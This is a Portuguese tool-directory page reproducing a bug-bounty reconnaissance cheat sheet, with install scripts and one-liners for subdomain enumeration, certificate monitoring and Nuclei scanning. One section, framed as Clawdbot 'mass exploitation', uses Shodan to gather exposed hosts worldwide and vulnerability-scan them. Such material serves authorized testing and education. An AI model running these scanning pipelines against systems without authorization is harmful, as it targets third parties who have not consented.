Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
KingOfBugBountyTips — Nosso principal objetivo é compartilhar dicas de alguns caçadores de bugs conhecidos. Usando metodologia de reconhecimento, conseguimos encontrar subdomínios, APIs e tokens que já são exploráveis, para que possamos reportá-los. Desejamos influenciar o Onelinetips e explicar os comandos, para melhor compreensão dos novos caçadores.. | Kitploit
Ferramentas/GitHubGitHub/kingofbugbounty/kingofbugbountytips
OSINT (Inteligência de Fontes Abertas)ReconhecimentoScanners de VulnerabilidadesSegurança WebTestes de PenetraçãoEnumeração de SubdomíniosAprendizado e EducaçãoRecursos CuradosTop em Reconhecimento nº8

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

GitHubkingofbugbounty/kingofbugbountytips

KingOfBugBountyTips

Ver Repositório
5.5k984há 1 mêsRevisado pelo Kitploit

Nosso principal objetivo é compartilhar dicas de alguns caçadores de bugs conhecidos. Usando metodologia de reconhecimento, conseguimos encontrar subdomínios, APIs e tokens que já são exploráveis, para que possamos reportá-los. Desejamos influenciar o Onelinetips e explicar os comandos, para melhor compreensão dos novos caçadores..

Compartilhar

KingOfBugBountyTips

Tactical Recon

O Arsenal Definitivo de Reconhecimento para Bug Bounty

"Nas sombras caçamos, no código confiamos"


Stars Forks Last Commit License


Telegram | Twitter | YouTube | LinkedIn


Escopo do VDP do DoD

Programa de Divulgação de Vulnerabilidades do DoD | KingRecon DOD

Escopo Completo do DoD - 19 Domínios```bash # BBRF Scope - All DoD Domains bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil' ``` | Ramos Militares | Agências do DoD | Comandos de Apoio | |:-----------------|:-------------|:-----------------| | `*.af.mil` - Força Aérea | `*.pentagon.mil` - Quartel-General do Pentágono | `*.dtic.mil` - Centro de Informações Técnicas | | `*.army.mil` - Exército | `*.osd.mil` - Gabinete do Secretário de Defesa | `*.dau.mil` - Universidade de Aquisição | | `*.marines.mil` - Fuzileiros Navais | `*.disa.mil` - Sistemas de Informação de Defesa | `*.health.mil` - Saúde Militar | | `*.navy.mil` - Marinha | `*.dtra.mil` - Redução de Ameaças | `*.ng.mil` - Guarda Nacional | | `*.spaceforce.mil` - Força Espacial | `*.dla.mil` - Agência de Logística | `*.uscg.mil` - Guarda Costeira | | `*.ussf.mil` - Força Espacial | `*.dcma.mil` - Gestão de Contratos | `*.socom.mil` - Operações Especiais |

Aviso de Segurança

Este repositório é APENAS para testes EDUCACIONAIS e AUTORIZADOS. Sempre obtenha autorização adequada antes de testar.

📜 Clique para ler nossa Política e Diretrizes de Segurança

✅ Casos de Uso Permitidos

  • ✅ Programas de Bug Bounty Autorizados - HackerOne, Bugcrowd, Intigriti, etc.
  • ✅ Testes de Penetração Autorizados - Com permissão por escrito
  • ✅ Ambientes de Laboratório Pessoais - Sua própria infraestrutura
  • ✅ Fins Educacionais - Aprendizado e pesquisa
  • ✅ Programa VDP do DoD - Seguindo as regras do programa

❌ Atividades Proibidas

  • ❌ Testes Não Autorizados - Testar sem permissão explícita
  • ❌ Intenção Maliciosa - Usar técnicas para causar dano ou roubo
  • ❌ Testes Fora do Escopo - Testar alvos fora do escopo do programa
  • ❌ Engenharia Social - A menos que explicitamente permitido no programa
  • ❌ Ataques DoS/DDoS - Ataques de exaustão de recursos

📋 Diretrizes de Divulgação Responsável

  1. Leia a Política do Programa - Sempre revise o escopo e as regras
  2. Teste com Segurança - Não cause danos a sistemas de produção
  3. Documente Tudo - Mantenha anotações detalhadas das suas descobertas
  4. Relate em Particular - Use canais oficiais para divulgação
  5. Dê Tempo para Corrigir - Permita que os fornecedores tenham tempo razoável para corrigir
  6. Seja Profissional - Mantenha padrões éticos

🔒 Relatar Problemas de Segurança


📚 Índice

Clique para expandir a navegação

🎯 Sobre

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ 🎯 MISSION STATEMENT 🎯 ║ ╠═══════════════════════════════════════════════════════════════╣ ║ Share elite bug bounty techniques from world-class hunters ║ ║ Build the most comprehensive one-liner collection ║ ║ Empower the security research community ║ ╚═══════════════════════════════════════════════════════════════╝ ```

Nosso principal objetivo é compartilhar dicas de caçadores de bugs conhecidos. Usando metodologia avançada de reconhecimento, descobrimos subdomínios, APIs, tokens e vulnerabilidades que são exploráveis. Nosso objetivo é influenciar e educar a comunidade com técnicas poderosas de one-liners para melhor compreensão e resultados mais rápidos.

🏆 O Que Torna Este Repositório Especial?

📦 Recursos Especiais

BugBuntu KingRecon Contribute

📊 Destaques do Repositório

📈 Clique para ver estatísticas detalhadas

🚀 Início Rápido

⚡ Execute seu primeiro reconhecimento em menos de 5 minutos

1️⃣ Instalar Ferramentas

Tempo
```bash # 📥 Step 1: Install essential tools (ProjectDiscovery Suite) go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

🔍 Step 2: Run your first reconnaissance chain

subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

🎉 Step 3: Analyze results and profit!

Check the output for vulnerabilities and start reporting!

root@kitploit:~
<details>
<summary><b>🎬 Quer um fluxo de trabalho automatizado completo? Clique aqui!</b></summary>

<br>```bash
# 🚀 Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt

# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# 💎 Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

🎯 Dicas Profissionais para Iniciantes


🛠️ Ferramentas Necessárias

Clique para expandir a lista completa de ferramentas

Ferramentas Principais


📊 Analíticos do Repositório


💖 Apoie o Projeto

Se este repositório ajudou você na sua jornada de bug bounty, considere apoiar o projeto!

Buy Me A Coffee

⭐ Mostre Seu Apoio

Dê uma estrela a este repositório se você achou útil!

GitHub stars


📜 Licença e Legal

License

⚠️ Aviso Importante

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ ⚠️ LEGAL NOTICE ⚠️ ║ ╠═══════════════════════════════════════════════════════════════╣ ║ This repository is for EDUCATIONAL PURPOSES ONLY ║ ║ ║ ║ ✅ DO: Use for authorized security testing ║ ║ ✅ DO: Learn and understand the techniques ║ ║ ✅ DO: Contribute and share knowledge ║ ║ ║ ║ ❌ DON'T: Use for unauthorized testing ║ ║ ❌ DON'T: Use for malicious purposes ║ ║ ❌ DON'T: Violate laws or regulations ║ ║ ║ ║ The authors are NOT responsible for any misuse or damage ║ ║ caused by this information. Always test responsibly! ║ ╚═══════════════════════════════════════════════════════════════╝ ```

🔗 Links Rápidos e Recursos


🌟 Agradecimentos Especiais

A todos os contribuidores, caçadores de recompensas e à comunidade de segurança que tornam este projeto possível!


Última Atualização: Julho de 2026 | Versão: 4.6



```ascii ╔══════════════════════════════════════════════════════════════════╗ ║ "Stay curious, stay ethical, stay hungry" 🏴‍☠️ ║ ║ Happy Hunting! 💀 ║ ╚══════════════════════════════════════════════════════════════════╝

root@kitploit:~
<br>

**Feito com ❤️ pela Comunidade Bug Bounty**

</div>
Baixar ferramenta

Encontrou um problema de segurança neste repositório? Por favor, relate-o de forma responsável:

Report Issue

SeçãoDescrição
SobreVisão geral e objetivos do projeto
Início RápidoComece em 5 minutos
Ferramentas NecessáriasConjunto de ferramentas essenciais
Escopo BBRF DoDConfiguração de escopo do DoD
Enumeração de SubdomíniosEncontrando subdomínios
Recon JavaScriptAnálise de arquivos JS
Detecção de XSSCross-site scripting
Injeção de SQLTécnicas de SQLi
SSRF e SSTIAtaques do lado do servidor
Rastreamento WebMétodos de rastreamento profundo
Descoberta de ParâmetrosParâmetros ocultos
Descoberta de ConteúdoArquivos sensíveis
Varredura NucleiVarredura automatizada
Testes de Segurança de APIVulnerabilidades de API
Segurança na NuvemAWS, GCP, Azure
Scripts de AutomaçãoScripts prontos para uso
Funções BashProdutividade no shell
Novos Oneliners 2026Exploits e técnicas CVE-2026
Oneliners 2024-2025Técnicas anteriores
Descoberta de CVE de Fevereiro de 2026Oneliners de reconhecimento CVE mais recentes
Mecanismos de BuscaMecanismos de busca para hackers
WordlistsMelhores wordlists
RecursosLivros, cursos, blogs
Oneliners
💎 Comandos Curados
Testados em batalha por caçadores reais
Methodology
🎯 Metodologia Completa
Do reconhecimento à exploração
Updated
🔄 Constantemente Atualizado
Novas técnicas semanalmente
Community
🌍 Impulsionado pela Comunidade
Principais caçadores do mundo
CategoriaContagemStatus
One-Liners400+✅ Ativo
Técnicas50+✅ Ativo
Ferramentas Abordadas100+✅ Ativo
Exemplos de CVE20+✅ Ativo
Domínios DoD19✅ Ativo
ContribuidoresCrescendo🚀 Crescendo
Última Atualização2026✅ Atual

2️⃣ Executar Reconhecimento

Tempo

3️⃣ Encontrar Bugs

Tempo
DicaDescrição
🔑Sempre obtenha autorização adequada antes de testar
📝Mantenha notas detalhadas das suas descobertas
🛠️Comece com ferramentas automatizadas, depois teste manualmente
💰Concentre-se primeiro em vulnerabilidades de alto impacto
🤝Junte-se à comunidade e aprenda com outros
CategoriaFerramentasInstalação
SubdomínioSubfinder, Amass, Assetfinder, Findomain, Chaosgo install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
Sondagem HTTPHttpx, Httprobego install github.com/projectdiscovery/httpx/cmd/httpx@latest
RastreamentoKatana, Gospider, Hakrawler, Cariddigo install github.com/projectdiscovery/katana/cmd/katana@latest
URLsGau, Waybackurls, Waymorego install github.com/lc/gau/v2/cmd/gau@latest
VarreduraNuclei, Jaeles, Naabugo install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
XSSDalfox, XSStrike, Kxss, Airixssgo install github.com/hahwul/dalfox/v2@latest
SQLiSQLMap, Ghauripip install sqlmap ghauri
UtilitáriosAnew, Qsreplace, Unfurl, Gf, Urogo install github.com/tomnomnom/anew@latest
FuzzingFfuf, Feroxbustergo install github.com/ffuf/ffuf/v2@latest
Análise de JSSubjs, LinkFinder, SecretFinder, Jsubfindergo install github.com/lc/subjs@latest
Monitoramento de CertificadosCertstream, Certstream-gopip install certstream
DNSDnsx, Shuffledns, PureDNS, MassDNS, Dnsgengo install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
DNS ReversoHakrevdns, Pripsgo install github.com/hakluke/hakrevdns@latest
Descoberta de APIArjun, x8, ParamSpiderpip install arjun
Capturas de TelaGowitness, Eyewitnessgo install github.com/sensepost/gowitness@latest
NuvemAWS CLI, CloudEnum, S3Scannerpip install awscli
OSINTShodan CLI, Censys, Metabigorpip install shodan censys
Reconhecimento GitTrufflehog, Gitrob, Github-Subdomainsgo install github.com/trufflesecurity/trufflehog/v3@latest
Gerenciamento de EscopoBBRFpip install bbrf

Dependências do Sistema```bash

Ubuntu/Debian

sudo apt update && sudo apt install -y
jq
curl
wget
git
python3
python3-pip
golang-go
nmap
masscan
chromium-browser
parallel
whois
dnsutils
libpcap-dev
build-essential

macOS

brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

root@kitploit:~
### Configuração do Ambiente Go```bash
# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Script de Instalação Rápida - Go Tools```bash

#!/bin/bash

One-click install for all Go tools

echo "[*] Installing Go tools..." go_tools=( # ProjectDiscovery "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" "github.com/projectdiscovery/httpx/cmd/httpx@latest" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" "github.com/projectdiscovery/katana/cmd/katana@latest" "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest" "github.com/projectdiscovery/dnsx/cmd/dnsx@latest" "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest" "github.com/projectdiscovery/chaos-client/cmd/chaos@latest" # Tomnomnom "github.com/tomnomnom/waybackurls@latest" "github.com/tomnomnom/anew@latest" "github.com/tomnomnom/qsreplace@latest" "github.com/tomnomnom/unfurl@latest" "github.com/tomnomnom/gf@latest" "github.com/tomnomnom/assetfinder@latest" "github.com/tomnomnom/httprobe@latest" # Fuzzing & Crawling "github.com/ffuf/ffuf/v2@latest" "github.com/jaeles-project/gospider@latest" "github.com/hakluke/hakrawler@latest" "github.com/hakluke/hakrevdns@latest" # Security "github.com/hahwul/dalfox/v2@latest" "github.com/lc/gau/v2/cmd/gau@latest" "github.com/lc/subjs@latest" # Screenshots & Utils "github.com/sensepost/gowitness@latest" "github.com/d3mondev/puredns/v2@latest" "github.com/j3ssie/metabigor@latest" "github.com/Emoe/kxss@latest" "github.com/ferreiraklet/airixss@latest" "github.com/edoardottt/cariddi/cmd/cariddi@latest" "github.com/trufflesecurity/trufflehog/v3@latest" )

for tool in "${go_tools[@]}"; do echo "[+] Installing $tool" go install -v "$tool" 2>/dev/null done

echo "[✓] Go tools installed!"

root@kitploit:~
### Script de Instalação Rápida - Ferramentas Python```bash
#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Script de Instalação Rápida - Ferramentas Rust (Feroxbuster)```bash

#!/bin/bash

Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

Install Rust if not present

if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi

Install Feroxbuster

cargo install feroxbuster

echo "[✓] Rust tools installed!"

root@kitploit:~
### Script de Instalação Rápida - Ferramentas Externas```bash
#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Script de Instalação Mestre (Tudo-em-Um)```bash

#!/bin/bash

MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗" echo "║ KingOfBugBounty - Complete Tool Installation ║" echo "╚══════════════════════════════════════════════════════════╝"

System dependencies (run with sudo)

echo "[1/5] Installing system dependencies..." sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

Go environment

echo "[2/5] Setting up Go environment..." echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc

Go tools

echo "[3/5] Installing Go tools..." go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install -v github.com/projectdiscovery/katana/cmd/katana@latest go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest go install -v github.com/tomnomnom/waybackurls@latest go install -v github.com/tomnomnom/anew@latest go install -v github.com/tomnomnom/qsreplace@latest go install -v github.com/tomnomnom/unfurl@latest go install -v github.com/tomnomnom/gf@latest go install -v github.com/tomnomnom/assetfinder@latest go install -v github.com/ffuf/ffuf/v2@latest go install -v github.com/hahwul/dalfox/v2@latest go install -v github.com/lc/gau/v2/cmd/gau@latest go install -v github.com/jaeles-project/gospider@latest go install -v github.com/hakluke/hakrawler@latest go install -v github.com/hakluke/hakrevdns@latest go install -v github.com/sensepost/gowitness@latest go install -v github.com/d3mondev/puredns/v2@latest go install -v github.com/owasp-amass/amass/v4/...@master

Python tools

echo "[4/5] Installing Python tools..." pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

Rust tools

echo "[5/5] Installing Rust tools..." if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi cargo install feroxbuster

Update Nuclei templates

nuclei -update-templates

echo "" echo "╔══════════════════════════════════════════════════════════╗" echo "║ ✓ Installation Complete! ║" echo "╚══════════════════════════════════════════════════════════╝" echo "" echo "Run 'source ~/.bashrc' to reload your environment"

root@kitploit:~
### Instalação de Wordlists```bash
#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Verificar Instalação```bash

#!/bin/bash

Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do if command -v $tool &> /dev/null; then echo "[✓] $tool" else echo "[✗] $tool - NOT FOUND" fi done

root@kitploit:~
</details>

---

## 🎯 BBRF Scope DoD```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Enumeração de Subdomínios ☠️

``` ███████╗██╗ ██╗██████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ██╗███╗ ██╗ ██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗██║████╗ ██║ ███████╗██║ ██║██████╔╝██║ ██║██║ ██║██╔████╔██║███████║██║██╔██╗ ██║ ╚════██║██║ ██║██╔══██╗██║ ██║██║ ██║██║╚██╔╝██║██╔══██║██║██║╚██╗██║ ███████║╚██████╔╝██████╔╝██████╔╝╚██████╔╝██║ ╚═╝ ██║██║ ██║██║██║ ╚████║ ╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ``` **☠️ ENUMERE TUDO ☠️**

💀 Descoberta Multi-Fonte (Tudo em Um)```bash

☠️ Ultimate subdomain enumeration - All tools combined

subfinder -d target.com -all -silent | anew subs.txt amass enum -passive -d target.com | anew subs.txt assetfinder -subs-only target.com | anew subs.txt chaos -d target.com -silent | anew subs.txt findomain -t target.com -q | anew subs.txt cat subs.txt | httpx -silent -threads 200 | anew alive.txt

root@kitploit:~
### 💀 Logs de Transparência de Certificados```bash
# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Certstream Monitoramento em Tempo Real - Básico```bash

☠️ Monitor certificates in real-time for specific keyword

pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

root@kitploit:~
### 💀 Certstream com Filtro de Domínio```bash
# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream para Descoberta de Subdomínios```bash

☠️ Extract all SANs (Subject Alternative Names) in real-time

certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target.com$" | sort -u | anew certstream_subs.txt

root@kitploit:~
### 💀 Certstream + httpx Live Pipeline```bash
# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Detecção de Phishing do Certstream```bash

☠️ Monitor for potential phishing domains (brand impersonation)

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE ".(paypal|apple|google|microsoft|amazon|facebook|netflix).com$" | anew phishing_certs.txt

root@kitploit:~
### 💀 Certstream com Auto-Scan do Nuclei```bash
# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Script Coletor em Massa Certstream```bash

☠️ Collect all certificates for specific TLDs

timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E ".(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

root@kitploit:~
### 💀 Certstream Caçador de Certificados Curinga```bash
# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Certstream + Shodan Enriquecimento```bash

☠️ Real-time certs -> resolve IP -> Shodan lookup

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

root@kitploit:~
### 💀 Certstream JSON Logger com Timestamp```bash
# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Bug Bounty Scope Monitor```bash

☠️ Monitor multiple bug bounty targets simultaneously

TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

root@kitploit:~
### 💀 Shodan + Nuclei Pipeline```bash
# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 Descoberta de Clawdbot via Shodan (Exploração em Massa)

⚡ 1. Encontrar Instâncias do Clawdbot - Busca Básica```bash

💀 Locate Clawdbot servers exposed on the internet

shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt

root@kitploit:~
#### ⚡ 2. Clawdbot HTTP Headers Discovery```bash
# 💀 Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"

⚡ 3. Detecção de User-Agent do Clawdbot```bash

💀 Detect Clawdbot via User-Agent strings

shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt

root@kitploit:~
#### ⚡ 4. Clawdbot + Nuclei Pipeline de Exploração```bash
# 💀 Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt

⚡ 5. Fingerprinting de Servidor do Clawdbot```bash

💀 Extract detailed server info from Clawdbot hosts

shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt

root@kitploit:~
#### ⚡ 6. Clawdbot Análise de Distribuição ASN```bash
# 💀 Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt

⚡ 7. Distribuição Geográfica do Clawdbot```bash

💀 Find Clawdbot by country for geo-targeted testing

for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done

root@kitploit:~
#### ⚡ 8. Clawdbot + Port Range Scan```bash
# 💀 Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt

⚡ 9. Análise de Certificado SSL Clawdbot```bash

💀 Extract Clawdbot hosts with SSL certificate info

shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt

root@kitploit:~
#### ⚡ 10. Clawdbot Monitor em Tempo Real + Alerta```bash
# 💀 Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &

💀 Descoberta de ASN e DNS Reverso```bash

☠️ Find all IPs from organization ASN

echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]+.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

root@kitploit:~
### 💀 DNS Bruteforce com Shuffledns```bash
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Enum Recursiva de Subdomínios```bash

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

root@kitploit:~
### 💀 Passive DNS - Múltiplas Fontes```bash
# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9](https://github.com/kingofbugbounty/kingofbugbountytips/blob/HEAD/%5Ba-zA-Z0-9-%5D*%5Ba-zA-Z0-9%5D)?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 Varredura de Subdomínios do GitHub```bash

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

root@kitploit:~
### 💀 Censys Subdomain Discovery```bash
# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API```bash

☠️ SecurityTrails subdomain enumeration

curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

root@kitploit:~
